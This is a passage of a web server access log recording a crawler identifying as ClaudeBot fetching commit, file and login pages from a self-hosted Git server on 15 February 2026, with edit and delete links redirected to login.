https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/include/site" -[15/Feb/2026:12:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/ControlRoom3.png" -[15/Feb/2026:12:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log" [Client 216.73.216.188] [Length 27643] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/websockets" -[15/Feb/2026:12:13:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2Findex.html" [Client 216.73.216.188] [Length 24092] [Gzip 6.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/ControlRoom4.png" -[15/Feb/2026:12:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2Fstyle.css.justbefore" [Client 216.73.216.188] [Length 27183] [Gzip 9.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 12166] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/activate.fish" -[15/Feb/2026:12:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log" [Client 216.73.216.188] [Length 10970] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/ControlRoom2.png" -[15/Feb/2026:12:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 216.73.216.188] [Length 10089] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/activate.fish" -[15/Feb/2026:12:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx" [Client 216.73.216.188] [Length 11531] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/ControlRoom3.png" -[15/Feb/2026:12:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" [Client 216.73.216.188] [Length 16219] [Gzip 7.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/dotenv" -[15/Feb/2026:12:13:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/httpx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" -[15/Feb/2026:12:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/httpx" -[15/Feb/2026:12:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 11551] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" -[15/Feb/2026:12:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03" [Client 216.73.216.188] [Length 28940] [Gzip 6.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/ControlRoom2.png" -[15/Feb/2026:12:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh?display=source" [Client 216.73.216.188] [Length 14937] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/dotenv" -[15/Feb/2026:12:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" [Client 216.73.216.188] [Length 20584] [Gzip 6.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log" [Client 216.73.216.188] [Length 10973] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" [Client 216.73.216.188] [Length 19740] [Gzip 7.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" [Client 216.73.216.188] [Length 12858] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Fpython" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json?display=source" [Client 216.73.216.188] [Length 11061] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs?display=source" [Client 216.73.216.188] [Length 11604] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md?display=source" [Client 216.73.216.188] [Length 15372] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Finclude" [Client 216.73.216.188] [Length 29176] [Gzip 6.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 13519] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fletsencrypt" [Client 216.73.216.188] [Length 24918] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/pip3" -[15/Feb/2026:12:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/pip" -[15/Feb/2026:12:13:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/.Backup/html/assets/images" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt?display=source" [Client 216.73.216.188] [Length 11373] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 11535] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include/site" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/pip" -[15/Feb/2026:12:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 11886] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 12995] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/.Backup/html/assets/images" -[15/Feb/2026:12:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include/site" -[15/Feb/2026:12:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 11036] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" [Client 216.73.216.188] [Length 11345] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 11554] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 25031] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 11568] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf" [Client 216.73.216.188] [Length 12972] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 25048] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" [Client 216.73.216.188] [Length 20853] [Gzip 9.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" [Client 216.73.216.188] [Length 16075] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf" [Client 216.73.216.188] [Length 12767] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 